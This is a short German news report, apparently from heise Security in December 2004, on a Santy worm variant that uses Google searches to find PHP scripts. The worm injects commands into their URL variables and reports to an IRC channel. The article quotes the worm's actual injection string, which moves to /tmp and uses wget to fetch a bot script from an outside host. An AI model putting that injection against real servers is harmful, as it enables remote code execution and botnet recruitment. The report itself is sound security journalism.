Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Say thank you!
You like the article and want to thank the author? Send him an amount of your choice.
Say thanks!
Ratings
Here you can write a comment
Related topics
Magento - Was erwartet uns mit Magento 2?
Es scheint die Roadmap zur Veröffentlichung der neuen, von der Magento Gemeinde heiß ersehnten Magento Version 2 zu stehen. Welche Neuerungen Magento User und Entwickler mit der Version 2.0 erwarten können, haben wir für Euch hier kurz zusammengefasst. ...
Autor :
admin
Category:
Software & Web-Development
Mozilla 0.9.5 - Browser mit neuen Features
Das aktuelle Release des OpenSource-Browsers Mozilla 0.9.5 bietet einige neue Funktionen, vor allem aber zahlreiche Bugfixes. Dabei Profitiert der User vor allem von einer verbesserten Leistung und einer erhöhten Ergonomie des Interface. ...
Autor :
admin
Category:
Software & Web-Development
PHPCon East 2003 in New York City
Auch dieses Jahr findet in New York City die PHPcon 2003 statt. Für alle die zu dieser Zeit in NY sind, empfehlen wir einen Besuch der PHPcon Konferenz. Hier der Originaltext des Veranstalters: Like PHP? Love PHP? LIVE PHP! Last year we launche ...
Autor :
admin
Category:
Software & Web-Development
MySQL-Front Version 2.2 available
-------------------------------------- Changes to the last version: -------------------------------------- New features: - Database-Tree: Fields are now displayed beyond the tables - MySQL-Errors now are displayed with a help-button, which links to ...
Autor :
admin
Category:
Software & Web-Development
PHP 5.1.2 erschienen
Das Update der Skriptsprache PHP auf 5.1.2 behebt diverse Fehler und schließt einige Sicherheitslücken seit der etwas überstürzt herausgebrachten Version 5.1.1. Neben 85 Bugfixes bringt die neue Release aber auch einige Funktionserweiterungen... Quelle ...
Autor :
admin
Category:
Software & Web-Development
PHP 5.2.5 beseitigt nicht nur Fehler
Die neue PHP-Version 5.2.5 beseitigt nicht nur Fehler, sondern bringt auch einige kleinere Verbesserungen mit. Insgesamt wurden 60 Bugs beseitigt und damit auch einige Sicherheitslücken geschlossen. golem.de ...
Autor :
admin
Category:
Software & Web-Development
